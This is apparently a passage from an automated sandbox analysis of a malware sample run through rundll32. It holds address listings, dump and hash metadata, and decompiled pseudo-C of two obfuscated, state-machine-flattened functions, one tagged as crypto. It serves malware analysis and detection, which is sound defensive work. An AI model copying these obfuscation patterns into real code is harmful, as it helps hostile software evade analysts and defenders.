                                                                                                                          0x00795f23
                                                                                                                          0x00795f2b
                                                                                                                          0x00795f33
                                                                                                                          0x00795f3b
                                                                                                                          0x00795f43
                                                                                                                          0x00795f4b
                                                                                                                          0x00795f53
                                                                                                                          0x00795f57
                                                                                                                          0x00795f5f
                                                                                                                          0x00795f67
                                                                                                                          0x00795f70
                                                                                                                          0x00795f73
                                                                                                                          0x00795f77
                                                                                                                          0x00795f7f
                                                                                                                          0x00795f8c
                                                                                                                          0x00795f95
                                                                                                                          0x00795f99
                                                                                                                          0x00795f9e
                                                                                                                          0x00795fa6
                                                                                                                          0x00795fae
                                                                                                                          0x00795fb6
                                                                                                                          0x00795fbe
                                                                                                                          0x00795fc6
                                                                                                                          0x00795fd1
                                                                                                                          0x00795fd9
                                                                                                                          0x00795fe4
                                                                                                                          0x00795fec
                                                                                                                          0x00795ff6
                                                                                                                          0x00795ffa
                                                                                                                          0x00796002
                                                                                                                          0x0079600a
                                                                                                                          0x00796012
                                                                                                                          0x00796017
                                                                                                                          0x0079601c
                                                                                                                          0x00796024
                                                                                                                          0x00796035
                                                                                                                          0x00796038
                                                                                                                          0x0079603c
                                                                                                                          0x00796044
                                                                                                                          0x0079604c
                                                                                                                          0x00796054
                                                                                                                          0x0079605c
                                                                                                                          0x00796064
                                                                                                                          0x00796069
                                                                                                                          0x00796071
                                                                                                                          0x00796079
                                                                                                                          0x00796081
                                                                                                                          0x00796091
                                                                                                                          0x0079609a
                                                                                                                          0x0079609d
                                                                                                                          0x007960a1
                                                                                                                          0x007960a9
                                                                                                                          0x007960b1
                                                                                                                          0x007960b9
                                                                                                                          0x007960be
                                                                                                                          0x007960c6
                                                                                                                          0x007960ce
                                                                                                                          0x007960d6
                                                                                                                          0x007960e2
                                                                                                                          0x007960e6
                                                                                                                          0x007960ee
                                                                                                                          0x007960f6
                                                                                                                          0x007960fe
                                                                                                                          0x00796106
                                                                                                                          0x0079610e
                                                                                                                          0x00796116
                                                                                                                          0x0079611e
                                                                                                                          0x00796126
                                                                                                                          0x0079612e
                                                                                                                          0x00796136
                                                                                                                          0x0079613b
                                                                                                                          0x00796148
                                                                                                                          0x0079614b
                                                                                                                          0x0079614f
                                                                                                                          0x00796157
                                                                                                                          0x00796167
                                                                                                                          0x0079616b
                                                                                                                          0x00796173
                                                                                                                          0x0079617b
                                                                                                                          0x00796183
                                                                                                                          0x00796188
                                                                                                                          0x00796190
                                                                                                                          0x00796194
                                                                                                                          0x0079619c
                                                                                                                          0x007961a9
                                                                                                                          0x007961aa
                                                                                                                          0x007961ae
                                                                                                                          0x007961b6
                                                                                                                          0x007961be
                                                                                                                          0x007961c6
                                                                                                                          0x007961ce
                                                                                                                          0x007961dc
                                                                                                                          0x007961e8
                                                                                                                          0x007961f0
                                                                                                                          0x007961fa
                                                                                                                          0x007961ff
                                                                                                                          0x00796207
                                                                                                                          0x0079620f
                                                                                                                          0x00796214
                                                                                                                          0x0079621c
                                                                                                                          0x00796224
                                                                                                                          0x00796232
                                                                                                                          0x00796237
                                                                                                                          0x0079623d
                                                                                                                          0x00796246
                                                                                                                          0x0079624b
                                                                                                                          0x00796251
                                                                                                                          0x00796259
                                                                                                                          0x00796261
                                                                                                                          0x00796265
                                                                                                                          0x0079626a
                                                                                                                          0x00796272
                                                                                                                          0x00796284
                                                                                                                          0x00796289
                                                                                                                          0x00796292
                                                                                                                          0x0079629d
                                                                                                                          0x007962a5
                                                                                                                          0x007962a9
                                                                                                                          0x007962ae
                                                                                                                          0x007962b6
                                                                                                                          0x007962be
                                                                                                                          0x007962c6
                                                                                                                          0x007962ce
                                                                                                                          0x007962d6
                                                                                                                          0x007962de
                                                                                                                          0x007962f0
                                                                                                                          0x007962f8
                                                                                                                          0x007962ff
                                                                                                                          0x0079630a
                                                                                                                          0x00796312
                                                                                                                          0x0079631a
                                                                                                                          0x0079631f
                                                                                                                          0x00796327
                                                                                                                          0x00796335
                                                                                                                          0x00796418
                                                                                                                          0x0079647f
                                                                                                                          0x00796484
                                                                                                                          0x0079648b
                                                                                                                          0x007964c8
                                                                                                                          0x007964ca
                                                                                                                          0x007964d2
                                                                                                                          0x0079648d
                                                                                                                          0x0079648d
                                                                                                                          0x00000000
                                                                                                                          0x0079648d
                                                                                                                          0x0079633b
                                                                                                                          0x00796341
                                                                                                                          0x0079640e
                                                                                                                          0x00000000
                                                                                                                          0x00796347
                                                                                                                          0x0079634d
                                                                                                                          0x007963ec
                                                                                                                          0x007963ed
                                                                                                                          0x007963ee
                                                                                                                          0x007963f3
                                                                                                                          0x007963fe
                                                                                                                          0x00796404
                                                                                                                          0x00000000
                                                                                                                          0x00796404
                                                                                                                          0x00796353
                                                                                                                          0x00796359
                                                                                                                          0x007964b1
                                                                                                                          0x007964b7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007964bd
                                                                                                                          0x0079635f
                                                                                                                          0x0079635f
                                                                                                                          0x007963bd
                                                                                                                          0x007963c2
                                                                                                                          0x007963c9
                                                                                                                          0x007963cf
                                                                                                                          0x00000000
                                                                                                                          0x007963cf
                                                                                                                          0x007963c9
                                                                                                                          0x00796359
                                                                                                                          0x0079634d
                                                                                                                          0x00796341
                                                                                                                          0x007964e1
                                                                                                                          0x007964e1
                                                                                                                          0x007964a6
                                                                                                                          0x007964ac
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: U$3n$3$TNz7$`%8$`%8$fxZn$~&t$6B
                                                                                                                          • API String ID: 0-1604698900
                                                                                                                          • Opcode ID: 273eb08752a5aad7e6ad1cd1c7ceb02e7e4ba07a57601fcfb2bed014858a475f
                                                                                                                          • Instruction ID: a614711c57efbd53c84cc5eb1c692b3021da2bfed918974b908b7aeafa8064cc
                                                                                                                          • Opcode Fuzzy Hash: 273eb08752a5aad7e6ad1cd1c7ceb02e7e4ba07a57601fcfb2bed014858a475f
                                                                                                                          • Instruction Fuzzy Hash: 43F11F715083809FC768CF65D589A4BBBF1FBC4B48F50891DF29A86260C7B68949CF03
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 100453C8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24registryclipboardCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Version$ClipboardFormatRegister
                                                                                                                          • String ID: MSWHEEL_ROLLMSG
                                                                                                                          • API String ID: 2888461884-2485103130
                                                                                                                          • Opcode ID: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                          • Instruction ID: 7f315ad506f9c9b1e51aced78a2c78e4f88a242cc2e5f9aa46fc8e210ad3a912
                                                                                                                          • Opcode Fuzzy Hash: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                          • Instruction Fuzzy Hash: 94E0483680016396F3019764AD447A43AD4D7896D7F324037DE00C2551DA6609C3866D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007970B3 Relevance: 10.3, Strings: 8, Instructions: 273COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E007970B3(void* __ecx, intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* _t276;
				intOrPtr _t301;
				void* _t302;
				intOrPtr _t305;
				void* _t306;
				intOrPtr _t312;
				intOrPtr* _t314;
				void* _t316;
				intOrPtr _t340;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int* _t352;

				_t342 = _a4;
				_t314 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007A20B9(_t276);
				_v8 = 0xc5496b;
				_t340 = 0;
				_v4 = 0;
				_t352 =  &(( &_v128)[5]);
				_v96 = 0xa893e5;
				_v96 = _v96 >> 0xb;
				_t316 = 0x77ea95;
				_v96 = _v96 ^ 0xaec74c08;
				_v96 = _v96 + 0xffff5908;
				_v96 = _v96 ^ 0xaec6b223;
				_v120 = 0x460837;
				_v120 = _v120 << 0xe;
				_t343 = 0x61;
				_v120 = _v120 / _t343;
				_v120 = _v120 ^ 0xba448c5d;
				_v120 = _v120 ^ 0xbb13b056;
				_v100 = 0x5f60bb;
				_t344 = 0x67;
				_v100 = _v100 / _t344;
				_v100 = _v100 << 2;
				_v100 = _v100 << 0xe;
				_v100 = _v100 ^ 0xed0e0000;
				_v104 = 0xcda695;
				_t345 = 0x65;
				_v104 = _v104 * 0x11;
				_v104 = _v104 + 0xffffbfc8;
				_v104 = _v104 / _t345;
				_v104 = _v104 ^ 0x00229cab;
				_v88 = 0xcb9151;
				_v88 = _v88 + 0x59e9;
				_v88 = _v88 ^ 0x7c8ac0da;
				_v88 = _v88 >> 0xc;
				_v88 = _v88 ^ 0x0007c412;
				_v124 = 0xc27732;
				_v124 = _v124 << 5;
				_v124 = _v124 * 0x69;
				_v124 = _v124 >> 0xd;
				_v124 = _v124 ^ 0x0007c2e3;
				_v108 = 0xd451e;
				_v108 = _v108 | 0x03d9c36b;
				_v108 = _v108 << 0x10;
				_v108 = _v108 >> 7;
				_v108 = _v108 ^ 0x018efe00;
				_v24 = 0xe3266e;
				_v24 = _v24 ^ 0xb39ac5a6;
				_v24 = _v24 ^ 0xb37ebd00;
				_v60 = 0xdd6dbc;
				_v60 = _v60 << 0xc;
				_v60 = _v60 >> 0xd;
				_v60 = _v60 ^ 0x00066ea0;
				_v92 = 0xdc27c1;
				_v92 = _v92 ^ 0xb7b3afa8;
				_t346 = 0x51;
				_v92 = _v92 / _t346;
				_v92 = _v92 >> 0xb;
				_v92 = _v92 ^ 0x000e15f4;
				_v28 = 0x55985f;
				_t347 = 0x64;
				_v28 = _v28 * 0x1f;
				_v28 = _v28 ^ 0x0a58c7ef;
				_v64 = 0x4cb0ae;
				_v64 = _v64 * 0x59;
				_v64 = _v64 + 0xffff44f7;
				_v64 = _v64 ^ 0x1aa02a50;
				_v32 = 0x4c255b;
				_v32 = _v32 >> 0xc;
				_v32 = _v32 ^ 0x000ba021;
				_v68 = 0x1bdf1a;
				_v68 = _v68 << 0xe;
				_v68 = _v68 << 8;
				_v68 = _v68 ^ 0xc683e60f;
				_v36 = 0xeace7c;
				_v36 = _v36 ^ 0x32d1e31b;
				_v36 = _v36 ^ 0x32395a0e;
				_v52 = 0x5778bf;
				_v52 = _v52 * 0x53;
				_v52 = _v52 ^ 0x1c501c28;
				_v56 = 0x56e07;
				_v56 = _v56 / _t347;
				_v56 = _v56 ^ 0x000a0e4e;
				_v128 = 0x2ec397;
				_v128 = _v128 + 0xffff4016;
				_v128 = _v128 ^ 0xc29a5f5c;
				_v128 = _v128 << 0xa;
				_v128 = _v128 ^ 0xd1754ce1;
				_v112 = 0x486dea;
				_t159 =  &_v112; // 0x486dea
				_t348 = 0x16;
				_v112 =  *_t159 * 0x75;
				_v112 = _v112 << 3;
				_v112 = _v112 + 0xffff4e4a;
				_v112 = _v112 ^ 0x08d01f1a;
				_v116 = 0xad5672;
				_v116 = _v116 << 0xa;
				_v116 = _v116 * 0x32;
				_v116 = _v116 >> 1;
				_v116 = _v116 ^ 0x35c1a461;
				_v40 = 0x750aef;
				_v40 = _v40 << 0xe;
				_v40 = _v40 ^ 0x42b6a378;
				_v72 = 0x7e8fee;
				_v72 = _v72 << 0xe;
				_v72 = _v72 + 0x885b;
				_v72 = _v72 ^ 0xa3f43c0d;
				_v44 = 0x717d1a;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 ^ 0x000f68d6;
				_v48 = 0x815897;
				_v48 = _v48 / _t348;
				_v48 = _v48 ^ 0x000d4a68;
				_v76 = 0xfbb4ce;
				_v76 = _v76 << 8;
				_v76 = _v76 + 0xffffed69;
				_v76 = _v76 ^ 0xfbbe0169;
				_v80 = 0xf07394;
				_v80 = _v80 << 0xf;
				_v80 = _v80 ^ 0x34c45092;
				_v80 = _v80 ^ 0x0d009df4;
				_v84 = 0xfdde74;
				_v84 = _v84 * 0x78;
				_v84 = _v84 << 7;
				_v84 = _v84 << 0xa;
				_v84 = _v84 ^ 0x8cc67a91;
				_v20 = 0xbaf80d;
				_t349 = 0x4e;
				_v20 = _v20 / _t349;
				_v20 = _v20 ^ 0x000183d9;
				do {
					while(_t316 != 0x77ea95) {
						if(_t316 == 0x220b753) {
							_t301 =  *0x7b3dfc; // 0x0
							_t302 = E007A5B3B(_t316, _v24,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t301 + 0x64)),  *_t342, _v60, _v92, _v96, _t340,  &_v12, _v100, _v104, _v28, _t316, _v64, _v32, _v68, _v36);
							_t352 =  &(_t352[0x10]);
							if(_t302 == _v88) {
								_t316 = 0xd86d689;
								continue;
							}
						} else {
							if(_t316 == 0xd7ced6e) {
								_t305 =  *0x7b3dfc; // 0x0
								_t306 = E007A5B3B(_t316, _v112,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t305 + 0x64)),  *_t342, _v116, _v40, _v120, _v16,  &_v12, _v12, _v124, _v72, _t316, _v44, _v48, _v76, _v80);
								_t352 =  &(_t352[0x10]);
								if(_t306 == _v108) {
									 *_t314 = _v16;
									_t340 = 1;
									 *((intOrPtr*)(_t314 + 4)) = _v12;
								} else {
									_t316 = 0xf392ab6;
									continue;
								}
							} else {
								if(_t316 == 0xd86d689) {
									_push(_t316);
									_push(_t316);
									_t312 = E00797FF2(_v12);
									_v16 = _t312;
									if(_t312 != 0) {
										_t316 = 0xd7ced6e;
										continue;
									}
								} else {
									if(_t316 != 0xf392ab6) {
										goto L14;
									} else {
										E007A8519(_v84, _v20, _v16);
									}
								}
							}
						}
						L17:
						return _t340;
					}
					_t316 = 0x220b753;
					L14:
				} while (_t316 != 0xf4b6a65);
				goto L17;
			}




















































                                                                                                                          0x007970bc
                                                                                                                          0x007970c3
                                                                                                                          0x007970c6
                                                                                                                          0x007970cd
                                                                                                                          0x007970d4
                                                                                                                          0x007970d5
                                                                                                                          0x007970d6
                                                                                                                          0x007970d7
                                                                                                                          0x007970dc
                                                                                                                          0x007970e7
                                                                                                                          0x007970e9
                                                                                                                          0x007970f0
                                                                                                                          0x007970f3
                                                                                                                          0x007970fd
                                                                                                                          0x00797102
                                                                                                                          0x00797107
                                                                                                                          0x0079710f
                                                                                                                          0x00797117
                                                                                                                          0x0079711f
                                                                                                                          0x00797127
                                                                                                                          0x00797132
                                                                                                                          0x00797137
                                                                                                                          0x0079713d
                                                                                                                          0x00797145
                                                                                                                          0x0079714d
                                                                                                                          0x00797159
                                                                                                                          0x0079715e
                                                                                                                          0x00797164
                                                                                                                          0x00797169
                                                                                                                          0x0079716e
                                                                                                                          0x00797176
                                                                                                                          0x00797183
                                                                                                                          0x00797186
                                                                                                                          0x0079718a
                                                                                                                          0x00797198
                                                                                                                          0x0079719c
                                                                                                                          0x007971a4
                                                                                                                          0x007971ac
                                                                                                                          0x007971b4
                                                                                                                          0x007971bc
                                                                                                                          0x007971c1
                                                                                                                          0x007971c9
                                                                                                                          0x007971d1
                                                                                                                          0x007971db
                                                                                                                          0x007971df
                                                                                                                          0x007971e4
                                                                                                                          0x007971ec
                                                                                                                          0x007971f4
                                                                                                                          0x007971fc
                                                                                                                          0x00797201
                                                                                                                          0x00797206
                                                                                                                          0x0079720e
                                                                                                                          0x00797216
                                                                                                                          0x0079721e
                                                                                                                          0x00797226
                                                                                                                          0x0079722e
                                                                                                                          0x00797233
                                                                                                                          0x00797238
                                                                                                                          0x00797240
                                                                                                                          0x00797248
                                                                                                                          0x00797256
                                                                                                                          0x0079725b
                                                                                                                          0x00797261
                                                                                                                          0x00797266
                                                                                                                          0x0079726e
                                                                                                                          0x0079727b
                                                                                                                          0x0079727e
                                                                                                                          0x00797282
                                                                                                                          0x0079728a
                                                                                                                          0x00797297
                                                                                                                          0x0079729b
                                                                                                                          0x007972a3
                                                                                                                          0x007972ab
                                                                                                                          0x007972b3
                                                                                                                          0x007972b8
                                                                                                                          0x007972c0
                                                                                                                          0x007972c8
                                                                                                                          0x007972cd
                                                                                                                          0x007972d2
                                                                                                                          0x007972da
                                                                                                                          0x007972e2
                                                                                                                          0x007972ea
                                                                                                                          0x007972f2
                                                                                                                          0x007972ff
                                                                                                                          0x00797303
                                                                                                                          0x0079730b
                                                                                                                          0x0079731b
                                                                                                                          0x0079731f
                                                                                                                          0x00797327
                                                                                                                          0x0079732f
                                                                                                                          0x00797337
                                                                                                                          0x0079733f
                                                                                                                          0x00797344
                                                                                                                          0x0079734c
                                                                                                                          0x00797354
                                                                                                                          0x00797359
                                                                                                                          0x0079735a
                                                                                                                          0x0079735e
                                                                                                                          0x00797363
                                                                                                                          0x0079736b
                                                                                                                          0x00797373
                                                                                                                          0x0079737b
                                                                                                                          0x00797385
                                                                                                                          0x00797389
                                                                                                                          0x0079738d
                                                                                                                          0x00797395
                                                                                                                          0x0079739d
                                                                                                                          0x007973a2
                                                                                                                          0x007973aa
                                                                                                                          0x007973b2
                                                                                                                          0x007973b7
                                                                                                                          0x007973bf
                                                                                                                          0x007973c7
                                                                                                                          0x007973cf
                                                                                                                          0x007973d4
                                                                                                                          0x007973dc
                                                                                                                          0x007973ea
                                                                                                                          0x007973ee
                                                                                                                          0x007973f6
                                                                                                                          0x007973fe
                                                                                                                          0x00797403
                                                                                                                          0x0079740b
                                                                                                                          0x00797413
                                                                                                                          0x0079741b
                                                                                                                          0x00797420
                                                                                                                          0x00797428
                                                                                                                          0x00797430
                                                                                                                          0x0079743d
                                                                                                                          0x00797443
                                                                                                                          0x00797448
                                                                                                                          0x0079744d
                                                                                                                          0x00797455
                                                                                                                          0x00797463
                                                                                                                          0x0079746b
                                                                                                                          0x0079746f
                                                                                                                          0x00797477
                                                                                                                          0x00797477
                                                                                                                          0x00797485
                                                                                                                          0x00797592
                                                                                                                          0x007975a6
                                                                                                                          0x007975ab
                                                                                                                          0x007975b2
                                                                                                                          0x007975b4
                                                                                                                          0x00000000
                                                                                                                          0x007975b4
                                                                                                                          0x0079748b
                                                                                                                          0x00797491
                                                                                                                          0x00797531
                                                                                                                          0x00797542
                                                                                                                          0x00797547
                                                                                                                          0x0079754e
                                                                                                                          0x007975d7
                                                                                                                          0x007975d9
                                                                                                                          0x007975e1
                                                                                                                          0x00797550
                                                                                                                          0x00797550
                                                                                                                          0x00000000
                                                                                                                          0x00797550
                                                                                                                          0x00797493
                                                                                                                          0x00797499
                                                                                                                          0x007974d4
                                                                                                                          0x007974d5
                                                                                                                          0x007974d6
                                                                                                                          0x007974db
                                                                                                                          0x007974e6
                                                                                                                          0x007974ec
                                                                                                                          0x00000000
                                                                                                                          0x007974ec
                                                                                                                          0x0079749b
                                                                                                                          0x007974a1
                                                                                                                          0x00000000
                                                                                                                          0x007974a7
                                                                                                                          0x007974b6
                                                                                                                          0x007974bb
                                                                                                                          0x007974a1
                                                                                                                          0x00797499
                                                                                                                          0x00797491
                                                                                                                          0x007975e4
                                                                                                                          0x007975f0
                                                                                                                          0x007975f0
                                                                                                                          0x007975be
                                                                                                                          0x007975c0
                                                                                                                          0x007975c0
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: [%L$hJ$n&$n|$n|$u$Y$mH
                                                                                                                          • API String ID: 0-2314355462
                                                                                                                          • Opcode ID: 7890cb327afa20de764dd6354e3ad81f0e20bc0d0682cb8ba5a8cadd32ec1eb4
                                                                                                                          • Instruction ID: 2cf437b05677039594bca45122a5bf46e0d903f2c4e9c0d3ba80b0bacf175e25
                                                                                                                          • Opcode Fuzzy Hash: 7890cb327afa20de764dd6354e3ad81f0e20bc0d0682cb8ba5a8cadd32ec1eb4
                                                                                                                          • Instruction Fuzzy Hash: BFD10E7110C3819FC768CF65D48A91BFBE1BBC4748F50891DF6A68A220C7B6C959CF42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007AC631 Relevance: 10.2, Strings: 8, Instructions: 218COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 92%
                                                                                                                          			E007AC631(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				void* _t214;
				void* _t220;
				void* _t224;
				void* _t228;
				void* _t229;
				void* _t233;
				void* _t234;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				void* _t248;
				void* _t249;
				signed int* _t251;
				void* _t254;

				_t251 =  &_v92;
				_t234 = __ecx;
				_v56 = 0x6c25e6;
				_v56 = _v56 >> 0xf;
				_v56 = _v56 >> 0xd;
				_v56 = _v56 ^ 0x000b07b8;
				_v60 = 0xfeb19f;
				_v60 = _v60 | 0xe5cfed25;
				_v60 = _v60 ^ 0x26a25afc;
				_v60 = _v60 ^ 0xc355f8a5;
				_v20 = 0x71f317;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x003a157d;
				_v64 = 0x229c82;
				_v64 = _v64 >> 6;
				_v64 = _v64 + 0x6845;
				_v64 = _v64 ^ 0x000e1a2d;
				_v80 = 0xaa3c23;
				_v80 = _v80 + 0x9f20;
				_v80 = _v80 + 0x8b23;
				_v80 = _v80 | 0x21cd8be9;
				_v80 = _v80 ^ 0x21ed2977;
				_v84 = 0xa275e1;
				_v84 = _v84 >> 0xd;
				_t248 = 0;
				_t236 = 0x36;
				_v84 = _v84 / _t236;
				_v84 = _v84 | 0x6f301759;
				_t249 = 0xe982267;
				_v84 = _v84 ^ 0x6f339045;
				_v88 = 0x6e61be;
				_v88 = _v88 ^ 0xaf54e0d1;
				_v88 = _v88 >> 4;
				_v88 = _v88 | 0xfa70c1e6;
				_v88 = _v88 ^ 0xfaf0db59;
				_v8 = 0x2c245a;
				_v8 = _v8 << 8;
				_v8 = _v8 ^ 0x2c2bf9b3;
				_v36 = 0xcb696d;
				_v36 = _v36 >> 4;
				_v36 = _v36 << 5;
				_v36 = _v36 ^ 0x019dc7aa;
				_v76 = 0xb5019c;
				_v76 = _v76 + 0xffffd3ce;
				_t237 = 0x3a;
				_v76 = _v76 / _t237;
				_v76 = _v76 + 0xe675;
				_v76 = _v76 ^ 0x000db5c6;
				_v40 = 0x1e681a;
				_t238 = 0x22;
				_v40 = _v40 / _t238;
				_v40 = _v40 + 0x9449;
				_v40 = _v40 ^ 0x00094c29;
				_v12 = 0x15a3d6;
				_v12 = _v12 * 0x6f;
				_v12 = _v12 ^ 0x096cbb26;
				_v44 = 0x420567;
				_v44 = _v44 * 0x2b;
				_v44 = _v44 >> 8;
				_v44 = _v44 ^ 0x0004b329;
				_v24 = 0xd75fdc;
				_v24 = _v24 + 0x1e6b;
				_v24 = _v24 ^ 0x00df7832;
				_v92 = 0x2978f4;
				_v92 = _v92 ^ 0x1aa3462f;
				_v92 = _v92 * 0x3a;
				_v92 = _v92 | 0xa828e589;
				_v92 = _v92 ^ 0xab738ef3;
				_v28 = 0xea47cd;
				_v28 = _v28 * 0x68;
				_v28 = _v28 ^ 0x5f2069e4;
				_v16 = 0x52c32f;
				_v16 = _v16 | 0xda6d254c;
				_v16 = _v16 ^ 0xda7308ab;
				_v48 = 0xc39de2;
				_v48 = _v48 ^ 0x402eeacb;
				_v48 = _v48 + 0xb85a;
				_v48 = _v48 ^ 0x40eaab85;
				_v52 = 0xbb994d;
				_v52 = _v52 | 0x0bb22e40;
				_v52 = _v52 ^ 0x7c36a9dd;
				_v52 = _v52 ^ 0x7782b78d;
				_v68 = 0x6ee7f1;
				_v68 = _v68 * 3;
				_v68 = _v68 * 0x65;
				_v68 = _v68 + 0xffffc283;
				_v68 = _v68 ^ 0x834839c0;
				_v4 = 0x2c076e;
				_v4 = _v4 >> 2;
				_v4 = _v4 ^ 0x00027705;
				_v32 = 0x2be47d;
				_v32 = _v32 >> 3;
				_v32 = _v32 << 0x10;
				_v32 = _v32 ^ 0x7c8953c8;
				_v72 = 0x664751;
				_v72 = _v72 + 0xffffb67a;
				_v72 = _v72 + 0xf05a;
				_v72 = _v72 + 0xffff370a;
				_v72 = _v72 ^ 0x0066b29b;
				goto L1;
				do {
					while(1) {
						L1:
						_t254 = _t249 - 0xe145aac;
						if(_t254 > 0) {
							break;
						}
						if(_t254 == 0) {
							_push(_t238);
							_push(_t238);
							_t220 = E0079474B();
							_t251 =  &(_t251[2]);
							_t249 = 0x70e2d06;
							_t248 = _t248 + _t220;
							continue;
						} else {
							if(_t249 == 0x15047ce) {
								_push(_t238);
								_push(_t238);
								_t224 = E0079474B();
								_t251 =  &(_t251[2]);
								_t249 = 0xe32aaf2;
								_t248 = _t248 + _t224;
								continue;
							} else {
								if(_t249 == 0x4d33fe3) {
									_push(_t238);
									_push(_t238);
									_t228 = E0079474B();
									_t251 =  &(_t251[2]);
									_t249 = 0xe45b300;
									_t248 = _t248 + _t228;
									continue;
								} else {
									if(_t249 == 0x708a22e) {
										_t238 = _v56;
										_t229 = E007AC2F8(_t238, _t234 + 0x1c, _v60, _v20, _v64);
										_t251 =  &(_t251[3]);
										_t249 = 0x15047ce;
										_t248 = _t248 + _t229;
										continue;
									} else {
										if(_t249 != 0x70e2d06) {
											goto L17;
										} else {
											_push(_t238);
											_push(_t238);
											_t233 = E0079474B();
											_t251 =  &(_t251[2]);
											_t249 = 0x4d33fe3;
											_t248 = _t248 + _t233;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t248;
					}
					if(_t249 == 0xe32aaf2) {
						_push(_t238);
						_push(_t238);
						_t214 = E0079474B();
						_t251 =  &(_t251[2]);
						_t249 = 0xe145aac;
						_t248 = _t248 + _t214;
						goto L17;
					} else {
						if(_t249 == 0xe45b300) {
							_t248 = _t248 + E007AC2F8(_v68, _t234 + 0x14, _v4, _v32, _v72);
						} else {
							if(_t249 != 0xe982267) {
								goto L17;
							} else {
								_t249 = 0x708a22e;
								goto L1;
							}
						}
					}
					goto L20;
					L17:
				} while (_t249 != 0xce30a1f);
				goto L20;
			}








































                                                                                                                          0x007ac631
                                                                                                                          0x007ac638
                                                                                                                          0x007ac63a
                                                                                                                          0x007ac644
                                                                                                                          0x007ac649
                                                                                                                          0x007ac64e
                                                                                                                          0x007ac656
                                                                                                                          0x007ac65e
                                                                                                                          0x007ac666
                                                                                                                          0x007ac66e
                                                                                                                          0x007ac676
                                                                                                                          0x007ac67e
                                                                                                                          0x007ac682
                                                                                                                          0x007ac68a
                                                                                                                          0x007ac692
                                                                                                                          0x007ac697
                                                                                                                          0x007ac69f
                                                                                                                          0x007ac6a7
                                                                                                                          0x007ac6af
